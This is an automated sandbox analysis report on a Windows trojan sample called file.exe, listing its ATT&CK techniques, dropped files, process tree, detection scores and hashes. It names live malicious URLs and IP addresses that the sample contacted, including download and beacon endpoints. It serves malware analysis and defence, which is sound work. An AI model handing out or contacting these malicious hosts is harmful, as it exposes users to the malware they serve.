Source: Yara match | File source: 00000000.00000000.306082555.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.253262177.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix (techniques listed per tactic; bracketed numbers are the count badges shown in the report's matrix, placed before the technique they belong to):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: [12] Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: [11] Masquerading; [1] Disable or Modify Tools; [21] Virtualization/Sandbox Evasion; [12] Process Injection; [1] Obfuscated Files or Information; [2] Software Packing; [1] Timestomp
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: [121] Security Software Discovery; [2] Process Discovery; [21] Virtualization/Sandbox Evasion; [1] Remote System Discovery; [1] System Network Configuration Discovery; [1] File and Directory Discovery; [13] System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: [1] Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: [11] Encrypted Channel; [11] Ingress Tool Transfer; [2] Non-Application Layer Protocol; [123] Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: Modify System Partition; Device Lockout; Delete Device Data; Data Encrypted for Impact
Behavior Graph ID: 715150, Sample: file.exe, Startdate: 03/10/2022, Architecture: WINDOWS, Score: 100

Signatures on the sample: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures

file.exe (started)
  Network: 208.67.104.97 (ports 49713, 49727, 80), GRAYSON-COLLIN-COMMUNICATIONSUS, United States; 85.31.46.167 (ports 49714, 80), CLOUDCOMPUTINGDE, Germany; 2 other IPs or domains
  Dropped: C:\Users\user\AppData\Local\...\Cleaner.exe, PE32; C:\Users\user\...\Bunifu_UI_v1.5.3.dll, PE32; C:\Users\user\AppData\Local\...\dll[1], PE32; C:\Users\user\AppData\Local\...\soft[1], PE32
  Child processes: cmd.exe (started); WerFault.exe (started); WerFault.exe (started); 8 other processes

cmd.exe
  Child processes: Cleaner.exe (started); conhost.exe (started)

WerFault.exe (first instance)
  Dropped: C:\ProgramData\Microsoft\...\Report.wer, Unicode

WerFault.exe (second instance)
  Dropped: C:\ProgramData\Microsoft\...\Report.wer, Unicode

8 other processes
  Dropped: C:\ProgramData\Microsoft\...\Report.wer, Unicode (three instances); 5 other malicious files

Cleaner.exe
  Network: iplogger.org 148.251.234.83 (ports 443, 49723), HETZNER-ASDE, Germany
  Signature: May check the online IP address of the machine

Source | Detection | Scanner | Label | Link
file.exe | 48% | ReversingLabs | Win32.Trojan.CrypterX |
file.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1] | 29% | ReversingLabs | Win32.Trojan.Lazy |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1] | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1] | 0% | Metadefender | | Browse
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte | 100% | URL Reputation | malware |
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174 | 0% | URL Reputation | safe |
http://www.tiro.com | 0% | URL Reputation | safe |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://fontfabrik.com | 0% | URL Reputation | safe |
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte | 100% | URL Reputation | malware |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
http://107.182.129.235/storage/ping.php | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
http://www.agfamonotype. | 0% | URL Reputation | safe |
http://107.182.129.235/storage/extension.php | 0% | URL Reputation | safe |
http://85.31.46.167/software.php | 0% | URL Reputation | safe |
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst | 100% | URL Reputation | malware |
http://85.31.46.167/software.phpll | 0% | Avira URL Cloud | safe |
http://85.31.46.167/software.phpZ | 0% | Avira URL Cloud | safe |
http://en.w | 0% | URL Reputation | safe |
https://iplogger.orgx | 0% | URL Reputation | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
http://85.31.46.167/software.phpll | 1% | Virustotal | | Browse
http://85.31.46.167/software.phpP | 0% | Avira URL Cloud | safe |
https://g-cleanit.hk | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
http://85.31.46.167/software.phpO | 0% | Avira URL Cloud | safe |
http://171.22.30.106/library.php | 100% | URL Reputation | malware |
http://85.31.46.167/software.phpx | 0% | Avira URL Cloud | safe |
http://85.31.46.167/software.phpstem32 | 0% | Avira URL Cloud | safe |
http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174 | 0% | Avira URL Cloud | safe |
http://85.31.46.167/software.phpZ | 6% | Virustotal | | Browse
http://85.31.46.167/software.php$ | 0% | Avira URL Cloud | safe |
http://85.31.46.167/software.phpCoo | 0% | Avira URL Cloud | safe |
http://85.31.46.167/software.phpl | 0% | Avira URL Cloud | safe |
http://www.ascendercorp.com/typedesigners.htmled. | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
iplogger.org | 148.251.234.83 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte | true | URL Reputation: malware | unknown
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte | true | URL Reputation: malware | unknown
http://107.182.129.235/storage/ping.php | false | URL Reputation: safe | unknown
http://107.182.129.235/storage/extension.php | false | URL Reputation: safe | unknown
http://85.31.46.167/software.php | true | URL Reputation: safe | unknown
https://iplogger.org/1Pz8p7 | false | | high
http://171.22.30.106/library.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersG | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://85.31.46.167/software.phpll | file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174 | Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.com | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Cleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designersrsivo | Cleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405489220.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.409086991.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405791697.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersers | Cleaner.exe, 00000021.00000003.391186193.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://85.31.46.167/software.phpZ | file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp | false | 6%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersp | Cleaner.exe, 00000021.00000003.391552464.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | Cleaner.exe, 00000021.00000003.387130957.0000024B7E1C3000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://85.31.46.167/software.phpP | file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://85.31.46.167/software.phpO | file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | Cleaner.exe, 00000021.00000003.382564725.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.agfamonotype. | Cleaner.exe, 00000021.00000003.396394419.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395554408.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.396105393.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395852274.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://85.31.46.167/software.phpx | file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://upx.sf.net | Amcache.hve.30.dr | false | | high
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst | file.exe, 00000000.00000000.306032693.000000000019B000.00000004.00000010.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://85.31.46.167/software.phpstem32 | file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174 | file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr | false | Avira URL Cloud: safe | unknown
https://iplogger.org | Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://en.w | Cleaner.exe, 00000021.00000003.379618679.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.378593000.0000024B7E185000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.383731927.0000024B7E1C4000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.379712996.0000024B7E18F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.ascendercorp.com/typedesigners.htmled. | Cleaner.exe, 00000021.00000003.387478626.0000024B7E190000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.387275120.0000024B7E190000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://iplogger.orgx | Cleaner.exe, 00000021.00000002.645456817.0000024B0040E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://85.31.46.167/software.phpl | file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://iplogger.org | Cleaner.exe, 00000021.00000002.645497591.0000024B00418000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://85.31.46.167/software.php$ | file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g-cleanit.hk | file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designerseK | Cleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers8 | Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/ | Cleaner.exe, 00000021.00000003.391036732.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://85.31.46.167/software.phpCoo | file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
148.251.234.83 | iplogger.org | Germany | 24940 | HETZNER-ASDE | false
208.67.104.97 | unknown | United States | 20042 | GRAYSON-COLLIN-COMMUNICATIONSUS | true
85.31.46.167 | unknown | Germany | 43659 | CLOUDCOMPUTINGDE | true
107.182.129.235 | unknown | Reserved | 11070 | META-ASUS | false
171.22.30.106 | unknown | Germany | 33657 | CMCSUS | false
                                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                                          Analysis ID:715150
                                                          Start date and time:2022-10-03 17:30:53 +02:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 11m 20s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:file.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Run name:Run with higher sleep bypass
                                                          Number of analysed new started processes analysed:44
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.winEXE@17/52@1/5
                                                          EGA Information:Failed
                                                          HDC Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 92%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, BackgroundTransferHost.exe, WerFault.exe, RuntimeBroker.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                          • TCP Packets have been reduced to 100
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                          • Execution Graph export aborted for target Cleaner.exe, PID 5272 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          No simulations
                                                          No context
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.9615479906283381
                                                          Encrypted:false
                                                          SSDEEP:192:+VCfavsSHox3uWI3jDyrD/u7scS274ItmFBx:Cjox3uNjg/u7scX4ItU
                                                          MD5:47885273E046E9CF2253FB23800F2B4E
                                                          SHA1:F4699B6698FEA95A6E1255A4F43DC33422FBB036
                                                          SHA-256:B6C978A12DDAC96E47DC9E5D373EB09537CCE6C063EC808D99291583365E557A
                                                          SHA-512:BDC428C9C6D9630F8AD39684948603F6BDD81F106880DCA6495C34B99098DFF12F1455F19D9A61AAC4AB7668426883ACA0F4DF2234F2CC69558AA0830CF348FF
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.2.0.5.1.2.2.0.2.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.1.5.b.5.6.6.5.-.3.0.6.4.-.4.1.6.b.-.a.7.6.7.-.8.b.4.a.3.6.4.c.d.6.9.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.c.0.e.2.8.9.-.e.0.0.7.-.4.7.f.2.-.8.f.f.b.-.4.7.7.a.1.b.5.e.2.4.f.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.9125206160115215
                                                          Encrypted:false
                                                          SSDEEP:192:D8VCfavDzH56rfI3jDyc/u7shS274ItmFBx:DMv56rojD/u7shX4ItU
                                                          MD5:A40D3063D78F2982A383CB5C50311B6C
                                                          SHA1:924CB5A083E7E29127B9CBC03A674E16EBC4156E
                                                          SHA-256:56EAFDA88322346DA6A302F4526E4CBB4CBEF54D5BEE2EE7CA3C140A49F05543
                                                          SHA-512:1A0C2E6C9FAE59DD9D104ED45FAB8E06059552726A1AFD53ECB83DD2C126F16DA12E142C490FF3D20DC280F2275D3080B41D9D3C0FD3CF5E75ACCDB87298C0C4
                                                          Malicious:true
